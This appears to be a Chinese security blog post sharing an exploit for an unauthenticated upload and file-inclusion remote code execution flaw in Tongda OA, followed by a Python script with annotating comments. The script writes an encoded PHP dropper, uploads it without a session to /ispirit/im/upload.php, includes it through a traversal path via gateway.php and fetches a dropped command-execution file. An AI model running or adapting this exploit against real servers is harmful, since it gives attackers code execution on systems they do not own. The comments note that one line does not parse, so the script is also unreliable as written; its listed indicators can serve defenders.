通达OA未授权任意文件上传及文件包含导致远程代码执行漏洞
本来想分析一下，后来发现文件都是加密的；虽然代码是 PHP Zend 5.4 加密的，可以解密，但兴趣过了，就直接发一下师傅的分析过程和 exp 吧：
1,http://blog.fuzz.pub/2020/03/17/通达oa RCE 分析/#more
2,https://www.t00ls.net/articles-55461.html
3,https://www.anquanke.com/post/id/201174
exp:
import os
import requests
# author :print("")
# Every request below is routed through a local intercepting proxy (Burp-style
# listener on 127.0.0.1:8080); the script will fail outright if nothing is
# listening there.
proxies = {
"http": "http://127.0.0.1:8080",
"https": "http://127.0.0.1:8080",
}
# Stage 1: materialise the dropper on disk (only once; the file is reused).
# The PHP in the literal is a dropper: when included server-side it writes
# 'readme.php' into the directory of the including script.  The base64 blob
# decodes to a URL-encoded PHP snippet that runs a fixed `whoami` through the
# Windows-only WScript.Shell COM object and echoes the result, so the dropped
# readme.php is a command-execution artifact (fixed command, not parameterised).
# NOTE(review): plain open()/close() without a context manager — if f.write
# raises, the handle leaks.  The indentation of the body is also flattened here
# (a paste artifact); this block keeps the original bytes untouched.
if not os.path.exists('1.txt'):
f=open('1.txt','w')
f.write('''<?php
$fp = fopen('readme.php', 'w');
$a = base64_decode("JTNDJTNGcGhwJTBBJTI0Y29tbWFuZCUzRCUyMndob2FtaSUyMiUzQiUwQSUyNHdzaCUyMCUzRCUyMG5ldyUyMENPTSUyOCUyN1dTY3JpcHQuc2hlbGwlMjclMjklM0IlMEElMjRleGVjJTIwJTNEJTIwJTI0d3NoLSUzRWV4ZWMlMjglMjJjbWQlMjAvYyUyMCUyMi4lMjRjb21tYW5kJTI5JTNCJTBBJTI0c3Rkb3V0JTIwJTNEJTIwJTI0ZXhlYy0lM0VTdGRPdXQlMjglMjklM0IlMEElMjRzdHJvdXRwdXQlMjAlM0QlMjAlMjRzdGRvdXQtJTNFUmVhZEFsbCUyOCUyOSUzQiUwQWVjaG8lMjAlMjRzdHJvdXRwdXQlM0IlMEElM0YlM0U=");
fwrite($fp, urldecode($a));
fclose($fp);
?>
''')
f.close()
# Hard-coded lab target.  For defenders the three paths are the useful
# indicators:
#   /ispirit/im/upload.php          — the attachment upload that is reached
#                                     here without any valid session
#   /ispirit/interface/gateway.php  — the include sink that executes the
#                                     uploaded file
#   /ispirit/interface/readme.php   — the on-disk artifact the dropper leaves
#                                     behind; its presence is a post-incident IoC
upload_url = "http://192.168.1.145:8181/ispirit/im/upload.php"
include_url = "http://192.168.1.145:8181/ispirit/interface/gateway.php"
shell_url="http://192.168.1.145:8181/ispirit/interface/readme.php"
# Stage 2: upload the dropper as an IM attachment.  The body shape — a bogus
# P (session) value plus DEST_UID and UPLOAD_MODE=2 — is what to alert on:
# the request succeeds with no authenticated session, which is the
# "unauthorised" half of the vulnerability.
# NOTE(review): this handle is never closed.
files = {'ATTACHMENT':open('1.txt','r')}
upload_data={"P":"123","DEST_UID":"1","UPLOAD_MODE":"2"}
upload_res = requests.post(upload_url,upload_data,files=files,proxies=proxies)
# The code assumes the plain-text upload response contains '@' and at least one
# '|': it keeps the text between the first '@' and the last '|', turns '_' into
# '/' and any remaining '|' into '.', and treats that as a path relative to
# attach/im/.  The response format itself is not shown on this page — confirm
# against a real response before relying on the slicing.
path = upload_res.text
path = path[path.find('@')+1:path.rfind('|')].replace("_","/").replace("|",".")
# Stage 3: make gateway.php include the uploaded file through a traversal path
# ("/general/../../attach/im/<path>").  A 'json' body whose url contains '../'
# is the indicator for this step.  NOTE(review): as written this line does not
# parse — the inner double quotes terminate the outer string literal.
include_data = {"json":"{"url":"/general/../../attach/im/" +path+""}"}
include_res = requests.post(include_url,data=include_data,proxies=proxies)
# Stage 4: fetch the dropped file; a `whoami` result in the body confirms that
# the include executed.  Note this request deliberately bypasses the proxy.
shell_res=requests.get(shell_url)
print(shell_res.text)